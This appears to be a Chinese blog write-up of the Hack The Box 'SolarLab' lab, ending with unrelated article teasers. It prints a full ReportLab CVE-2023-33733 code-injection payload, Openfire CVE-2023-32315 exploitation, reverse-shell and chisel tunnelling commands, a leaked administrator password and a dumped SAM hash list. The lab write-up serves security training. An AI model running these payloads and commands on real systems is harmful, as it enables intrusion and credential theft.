Hack The Box-SolarLab

总体思路

SMB获取敏感信息->CVE-2023-33733漏洞注入->CVE-2023-32315->敏感信息泄露

信息收集&端口利用

nmap -sSVC -p1-10000 10.10.11.16

在这里插入图片描述

发现目标开放了80、135、139、445和6791端口,并且对应的端口也给出了重定向的标志,将域名加入到hosts文件中以访问

#/etc/hosts
10.10.11.16	solarlab.htb report.solarlab.htb

在这里插入图片描述

80端口只有一个在不断跳动的倒计时,对其进行信息收集

在这里插入图片描述

发现主网站没有什么能够利用的点,查看report子域名

在这里插入图片描述

6791端口是一个ReportHub的界面,但是经过尝试,暴力破解和万能密码对其均不起作用,想到最开始的445端口还没用利用,尝试匿名访问

发现突破点

SMB 匿名访问

在这里插入图片描述

smb存在匿名访问,那就继续进入Documents文件夹查看

在这里插入图片描述

发现details-file.xlsx和old_leave_request_form.docx文件,经过查看,docx文件没有利用价值,在xlsx文件中有存放账号和密码

在这里插入图片描述

于是利用这里面的账号密码去爆破6791端口的登录界面

在这里插入图片描述

但是发现全都失败

于是有了一段特别离谱的分析(

首先在xlsx文件中能看到只有三个用户是存在的,分别是Alexander、Claudia、Blake

在这里插入图片描述

但是在下方的用户名处,username却发生了变化

在这里插入图片描述

A用户结尾多了一个K,C用户结尾多了一个S,从后边邮箱可知,加的字母为其邮箱中.后面的字母,但是B用户邮箱中并没有.,而其用户名中带了.,推测其登录用户为blakeb(以上猜想纯属巧合,实在是没找到QAQ,有知道的可以在评论区说一下,万分感谢!

然后拿着这一段(胡乱猜测逻辑的)密码,能够进入6791端口

在这里插入图片描述

搜索该组件可以了解到,该网页是把填入的信息转化成pdf

在这里插入图片描述

在这里插入图片描述

CVE-2023-33733

搜索reporthub相关漏洞,结果比较少,但是看到了reportlab的漏洞CVE-2023-33733,两者都是将html转化pdf的组件

#POC
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('SHELL') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>

将poc里的SHELL改为Windows的反弹shell,复制进数据包中travel_request模块下

在这里插入图片描述

发送过后即能拿到blake用户的shell

在这里插入图片描述

逐个查看当前目录信息

在这里插入图片描述

第一个目录就有好消息,有users.db数据库文件,没有用msf不能直接下载,此处先将其转化为base64格式后复制出来,再转化为文本查看

在这里插入图片描述

发现了几个用户的密码,应该为6791界面的登录密码,继续查看其他目录,没有发现什么敏感信息,那就查看端口开放情况,看看有没有隐藏端口没有显示

在这里插入图片描述

有9090和9091端口,将他们代理到本地

#kali:
chisel server -p 6150 --reverse
#Windows:
./chisel.exe client 10.10.14.43:6150 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

发现是openfire组件,并且版本为4.7.4,在笔者之前发布的Jab靶机中有提到过这个漏洞,这里虽然没有登录凭证,但是存在CVE-2023-32315能够直接新建一个用户

CVE-2023-32315

在这里插入图片描述

运行脚本

python3 CVE-2023-32315.py -t http://127.0.0.1:9090

在这里插入图片描述

使用得到的用户名和密码登录进界面,在plugins处上传之前拿到过的插件,详见Hack The Box-Jab

在这里插入图片描述

然后在Server->Server Settings可以看到上传的插件:shell Plugin

在这里插入图片描述

使用密码123登录进管理界面

在这里插入图片描述

选择系统命令

在这里插入图片描述

输入一段反弹shell,可以得到openfire用户的shell

在这里插入图片描述

查看用户可执行的特权

在这里插入图片描述

没有可以利用的点,继续进行信息收集,在主目录下看到了embedded-db文件夹,进入查看

在这里插入图片描述

在这里插入图片描述

逐个查看openfire的文件,在openfire.script文件中找到了一段密文和salt

在这里插入图片描述

从描述来看,这一段密码指的就是administrator的凭证

因为该组件为openfire,而openfire又有其单独的加密方式,详见

https://github.com/c0rdis/openfire_decrypt?tab=readme-ov-file

将工具下载到本地编译,并运行

在这里插入图片描述

得到administrator的密码为ThisPasswordShouldDo!@,尝试使用evil-winrm登录(过了许久还没登录上)

上传RunasCs,然后再使用administrator的凭证反弹shell

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.43:9200

在这里插入图片描述

提权成功

另外,可以使用crackmapexec导出hash值

crackmapexec smb 10.10.11.16 -u administrator -p 'ThisPasswordShouldDo!@' --samSMB         10.10.11.16     445    SOLARLAB         [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\administrator:ThisPasswordShouldDo!@ (Pwn3d!)
SMB         10.10.11.16     445    SOLARLAB         [+] Dumping SAM hashes
SMB         10.10.11.16     445    SOLARLAB         Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::
SMB         10.10.11.16     445    SOLARLAB         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.16     445    SOLARLAB         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.16     445    SOLARLAB         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
SMB         10.10.11.16     445    SOLARLAB         blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::
SMB         10.10.11.16     445    SOLARLAB         openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::
SMB         10.10.11.16     445    SOLARLAB         [+] Added 6 SAM hashes to the database

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/11453.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

实验过程演示【计算机网络实验】

前言 这是陈旧已久的草稿2023-05-20 11:23:54 这个是计算机网络的一个实验&#xff0c;现在也不知道这个是啥来着。 现在2024-5-12 22:33:17&#xff0c;发布到[计算机网络实验]专栏中。 实验过程演示 2023-5-18 20:17:45 1&#xff0e;搭建一个多跳网络拓扑&#xff0c;…

算法题解记录25+++验证二叉搜索树(百日筑基)

题目描述&#xff1a; 难度&#xff1a;中等 给你一个二叉树的根节点 root &#xff0c;判断其是否是一个有效的二叉搜索树。 有效 二叉搜索树定义如下&#xff1a; 节点的左 子树 只包含 小于 当前节点的数。节点的右子树只包含 大于 当前节点的数。所有左子树和右子树自身必…

软件开发模型介绍

软件开发模型&#xff08;Software Development Model&#xff09;是指软件开发全部过程、活动和任务的结构框架。它清晰、直观地表达软件开发全过程&#xff0c;明确规定了要完成的主要活动和任务&#xff0c;用来作为软件项目工作的基础。 一、常见的软件开发模型&#xff1…

【MISRA-C-2012】:标准的理解与学习

标准的理解与学习 引用二、Misra-C 规则Misra-C全解读 - Rule 1 标准的C语言环境&#xff08;待更新&#xff09;Misra-C全解读 - Rule 2 未使用的代码&#xff08;待更新&#xff09;Misra-C全解读 - Rule 3 注释&#xff08;待更新&#xff09;Misra-C全解读 - Rule 4 字符与…

ThinkPHP+MySQL查询数据的时候计算两个经纬度之间的距离并根据距离进行筛选

原需求实现说明 新增了一个按距离进行筛选的需求。需要把查询代码做如下修改 /*** 求职意向* return void* throws \think\exception\DbException*/public function get_lists(){$request $this->request->get();if(empty($request[lng]) || empty($request[lat])){$th…

如何抠图?6个简单方便的抠图软件教你自己快速抠图

如何抠图&#xff1f;6个简单方便的抠图软件教你自己快速抠图 抠图是图像处理中常见的操作之一&#xff0c;它可以帮助我们从一幅图像中抠出特定的部分&#xff0c;通常用于制作合成图、更换背景或修改图像内容。下面介绍的6款简单方便的抠图软件可以帮助您快速进行抠图操作&a…

PyQt:界面无边框+实现窗口最小化(任务栏图标隐藏+托盘图标显示)

一、整体实现效果 诸如WX、各种管家的桌面显示方式。窗口关闭后&#xff0c;往往是任务栏图标消失&#xff0c;保持右下角托盘图标显示&#xff0c;保持后台运行。双击托盘图标后&#xff0c;窗口显示。 二、代码实现 from PyQt5.QtWidgets import * from ato_upgrade impo…

失效模式分析的适用范围与注意事项——SunFMEA软件

失效模式分析对产品从设计完成之后&#xff0c;到首次样品的发展而后生产制造&#xff0c;到品管验收等阶段都可说皆有许多适用范围&#xff0c;基本上可以活用在3个阶段。 一、设计阶段的失效模式分析 1.针对已设计的构想作为基础&#xff0c;逐项检讨系统的构造、机能上的问…

CSS常用滤镜效果

CSS 提供了多种滤镜效果&#xff0c;可以通过 filter 属性应用于 HTML 元素。以下是一些常用的 CSS 滤镜效果&#xff1a; 一、灰度 (Grayscale) 将图像转换为灰度图像。值在 0%&#xff08;原始图像&#xff09;和 100%&#xff08;完全灰度&#xff09;之间。 filter: gra…

qt信号和槽之间传送其他数据类型

提交信号和接受槽文件里分别全局声明该结构 Q_DECLARE_METATYPE (can) 在提交信号的时候将该数据结构set到QVariant里 在槽的接收里 &#xff0c;直接.value强转为声明的自定义结构里 void MainWindow::canrecvdeal(QVariant sy)//CAN_FRAME_MAG v { CAN_FRAME_MAG v; vsy.valu…

android进阶-回调

回调&#xff08;Callback&#xff09;是一种常见的编程模式&#xff0c;用于处理异步事件或信息传递。通过回调&#xff0c;一个对象&#xff08;通常是一个事件的发起者或处理者&#xff09;可以将某些任务或行为的执行通知给另一个对象 常见例子&#xff1a; 事件监听器&a…

Next.js+TS项目中的错误边界处理与渲染降级实践

在开发基于Next.js的TypeScript应用程序时&#xff0c;我们经常会遇到一些意料之外的JavaScript错误&#xff0c;这些错误可能会导致页面直接白屏&#xff0c;严重影响用户体验。为了提升应用的健壮性和用户体验&#xff0c;引入ErrorBoundary组件是一种非常有效的策略。本文将…

【回溯 栈 代数系统 动态规划】282. 给表达式添加运算符

本文涉及知识点 回溯 栈 代数系统 动态规划 LeetCode 282. 给表达式添加运算符 给定一个仅包含数字 0-9 的字符串 num 和一个目标值整数 target &#xff0c;在 num 的数字之间添加 二元 运算符&#xff08;不是一元&#xff09;、- 或 * &#xff0c;返回 所有 能够得到 ta…

Rust 中的声明可见性

Rust 中的声明可见性 在 Rust 编程语言中&#xff0c;声明可见性是一个核心概念&#xff0c;它决定了代码中的项&#xff08;如函数、结构体、枚举等&#xff09;在哪些范围内可以被访问。Rust 通过一套严谨的规则来控制这些可见性&#xff0c;以确保代码的安全性和封装性。下…

Ngnix VTS模块添加和测试

目录 VTS模块介绍 上传软件包xftp/lrzsz 执行脚本 添加vts的配置 测试 测试&#xff1a;nginx.conf配置文件是否有语法错误 测试&#xff1a;windows机器上访问效果 VTS模块介绍 Nginx VTS模块&#xff08;nginx Virtual Host Traffic Status Module&#xff09;是一个第三…

【C++初阶】string模拟实现

✅✅✅✅✅✅✅✅✅✅✅✅✅✅✅✅ ✨✨✨✨✨✨✨✨✨✨✨✨✨✨✨✨ &#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1f33f;&#x1…

【精读Yamamoto】方向性连接如何丰富神经网络的功能复杂度 | 体外神经元培养实验 | 脉冲神经元模型(SNN) | 状态转移模型

探索大脑的微观世界&#xff1a;方向性连接如何丰富神经网络的功能复杂度 在神经科学领域&#xff0c;理解大脑如何通过其复杂的网络结构实现高级功能一直是一个核心议题。最近&#xff0c;一项由Nobuaki Monma和Hideaki Yamamoto博士领导的研究为我们提供了新的视角&#xff…

cuttag学习笔记

由于课题可能用上cut&tag这个技术&#xff0c;遂跟教程学习一波&#xff0c;记录一下以便后续的学习&#xff08;主要是怕忘了&#xff09; 教程网址cut&tag教程 背景知识&#xff1a;靶标下裂解与标记&#xff08;Cleavage Under Targets & Tagmentation&#xf…

什么是跨境物流管理系统,它有什么功能

对于从事跨境物流的物流商来说&#xff0c;提升物流效率是一直都需要考虑的问题。不过不用担心&#xff0c;跨境物流系统&#xff08;TMS&#xff09;是个不错的解决方案。 谁应该使用跨境物流管理系统&#xff1f; 可以说&#xff0c;跨境物流系统最大的特点就是使用上的灵活性…

90后医生下班摆摊就能赚1500?看内行人是如何分析的?2024普通人逆袭的机会,2024普通人想翻身的风口行业

“在自己空余的时间&#xff0c;做点自己喜欢的事情”这就是浙江义乌的王医生&#xff0c;摆摊被采访时的回答。王大夫说&#xff0c;自己兼职已经有半年多了&#xff0c;每天的营业额能达到1500元。同时王医生表示&#xff0c;自己的目标是开一间自己的小店。 看到这里&#x…